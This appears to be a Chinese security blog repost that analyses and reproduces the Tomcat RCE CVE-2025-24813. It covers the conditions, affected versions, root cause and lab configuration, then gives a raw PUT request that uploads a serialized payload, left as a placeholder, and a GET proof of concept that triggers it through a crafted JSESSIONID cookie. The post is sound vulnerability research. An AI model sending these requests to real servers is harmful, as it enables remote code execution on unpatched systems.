全网首发!CVE-2025-24813 Tomcat 最新 RCE 分析复现
全网首发!CVE-2025-24813 Tomcat 最新 RCE 分析复现
菜狗 富贵安全 2025-05-24 00:03
漏洞概况
Tomcat 是一个开源的、轻量级的 Web 应用服务器 和 Servlet 容器。它由 Apache 软件基金会下的 Jakarta 项目开发,是目前最流行的 Java Web 服务器之一。
该漏洞利用条件较为复杂,需同时满足以下四个条件:
1. 应用程序启用了DefaultServlet写入功能,该功能默认关闭
-
应用支持了 partial PUT 请求,能够将恶意的序列化数据写入到会话文件中,该功能默认开启
-
应用使用了 Tomcat 的文件会话持久化并且使用了默认的会话存储位置,需要额外配置
-
应用中包含一个存在反序列化漏洞的库,比如存在于类路径下的 commons-collections,此条件取决于业务实现是否依赖存在反序列化利用链的库
漏洞影响范围
– 9.0.0.M1 <= tomcat <= 9.0.98
-
10.1.0-M1 <= tomcat <= 10.1.34
-
11.0.0-M1 <= tomcat <= 11.0.2
漏洞原理分析
Content-Range
在 Tomcat 的HTTP PUT请求中主要用于实现大文件的分块传输。在文件上传未完成的情况下,内容会被临时存储在Tomcat的工作目录:$CATALINA_BASE/work/Catalina/localhost/ROOT
。
该漏洞的核心在于不完整PUT请求上传时的文件名处理机制:文件路径中的分隔符/
会被转换为.
。例如:访问/xxxxx/session
会被解析为.xxxxx.session
因此整个漏洞的利用过程为:
1. Tomcat的File会话存储默认路径同样位于:CATALINA_BASE/work/Catalina/localhost/ROOT
-
当存在反序列化利用链时,可以上传包含恶意序列化数据的文件
-
通过设置JSESSIONID=.xxxxx
来触发漏洞
环境配置
在conf/context.xml中,添加如下配置,开启File文件会话存储
<Context\> <Manager className\="org.apache.catalina.session.PersistentManager"\> <Store className\="org.apache.catalina.session.FileStore"/> </Manager\> </Context\>
在conf/web.xml中,将DefaultServlet的readonly配置为false,启用写入功能
<servlet\> <servlet-name\>default</servlet-name\> <servlet-class\>org.apache.catalina.servlets.DefaultServlet</servlet-class\> <init-param\> <param-name\>debug</param-name\> <param-value\>0</param-value\> </init-param\> <init-param\> <param-name\>readonly</param-name\> <param-value\>false</param-value\> </init-param\> <load-on-startup\>1</load-on-startup\> </servlet\>
将Commons Collections 3.2.1.jar放入lib文件夹
漏洞复现
生成一个恶意的序列化文件,使用以下数据包上传,需要注意Range的分块值需要与Length保持一致,且大于当前文件的长度。
PUT /xxxxx/session HTTP/1.1Host: 192.168.131.32:8080Content-Length: 1000Content-Range: bytes 0-1000/1200{{反序列化文件内容)}}
使用以下PoC触发
GET / HTTP/1.1Host: 192.168.131.32:8080Cookie: JSESSIONID=.xxxxx
修复方案
Apache基金会官方已发布漏洞公告,可下载补丁更新:https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq
原文链接:
https://forum.butian.net/article/674